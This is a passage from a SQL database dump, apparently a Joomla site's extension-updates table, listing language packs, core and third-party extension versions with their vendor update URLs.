CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6522,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6523,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6524,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6525,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6526,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6527,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6528,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6529,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6530,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6531,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6532,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6533,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6534,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6535,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6536,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6537,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6538,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6539,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6540,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6541,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6542,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6543,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6544,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6545,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6546,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6547,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6548,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6549,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6550,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6551,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(6552,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6553,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6554,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6555,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6556,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6557,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6558,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6559,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6560,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6561,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6562,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6563,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6564,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6565,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6566,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6567,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6568,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6569,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6570,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6571,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6572,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6573,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6574,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6575,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6576,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6577,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6578,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6579,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6580,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6581,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6582,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6583,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(6584,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(6585,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(6586,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(6587,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(6588,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(6589,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6590,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6591,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6592,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6593,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6594,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6595,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6596,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6597,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6598,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6599,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6600,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6601,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6602,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6603,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6604,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(6605,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6606,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6607,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6608,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6609,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6610,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6611,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6612,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6613,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6614,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6615,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6616,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6617,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6618,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6619,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6620,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6621,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6622,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6623,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6624,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6625,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6626,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6627,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6628,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6629,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6630,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6631,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6632,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6633,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6634,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6635,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6636,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(6637,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(6638,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(6640,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6641,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6642,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6643,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6644,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6645,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6646,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6647,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6648,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6649,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6650,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6651,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6652,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6653,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6654,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6655,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6656,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6657,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6658,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(6659,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6660,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6661,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6662,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6663,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6664,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6665,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6666,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6667,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6668,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6669,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6670,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6671,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6672,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6673,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6674,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6675,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6676,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6677,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6678,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6679,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6680,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6681,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6682,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6683,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6684,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6685,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6686,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6687,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6688,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6689,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6690,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(6691,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(6692,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(6693,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(6694,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(6695,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(6696,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6697,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6698,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6699,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6700,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6701,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6702,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6703,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6704,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6705,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6706,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6707,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6708,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6709,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6710,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6711,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(6712,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6713,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6714,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6715,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6716,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6717,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6718,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6719,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6720,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6721,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6722,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6723,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6724,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6725,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6726,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6727,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6728,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6729,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6730,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6731,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6732,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6733,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6734,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6735,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6736,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6737,57,0,'German 